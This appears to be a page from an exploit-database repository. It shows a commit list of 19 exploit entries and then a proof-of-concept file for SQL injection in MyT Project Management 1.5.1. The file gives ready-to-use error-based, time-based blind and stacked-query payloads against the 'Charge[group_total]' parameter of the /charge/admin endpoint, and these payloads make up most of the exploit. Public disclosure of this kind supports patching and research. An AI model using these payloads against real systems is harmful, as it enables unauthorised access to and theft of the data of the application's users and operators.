deaee53895
19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
34 lines
No EOL
1.2 KiB
Text
34 lines
No EOL
1.2 KiB
Text
# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection
|
|
# Date: 03.01.2019
|
|
# Exploit Author: Mehmet Önder Key
|
|
# Vendor Homepage: https://manageyourteam.net/
|
|
# Software Link: https://sourceforge.net/projects/myt/
|
|
# Version: v1.5.1
|
|
# Category: Webapps
|
|
# Tested on: WAMPP @Win
|
|
# Software description:
|
|
MyT (Manage Your Team) - is a free open source task management and project
|
|
management system, based on Yii Framework, easy to use and with a great
|
|
perspective of growth for the future.
|
|
|
|
# Vulnerabilities:
|
|
# An attacker can access all data following an un/authorized user login
|
|
using the parameter.
|
|
|
|
# POC - SQL Injection :
|
|
|
|
# Parameter: Charge[group_total](POST)
|
|
# Request URL: /charge/admin
|
|
|
|
# Type : Error Based
|
|
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND
|
|
EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT
|
|
(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid
|
|
|
|
# Type : Time-Based Blind
|
|
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM
|
|
(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid
|
|
|
|
# Type : Stacked Queries
|
|
# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT
|
|
SLEEP(5)#&Charge_page=1&ajax=charge-grid |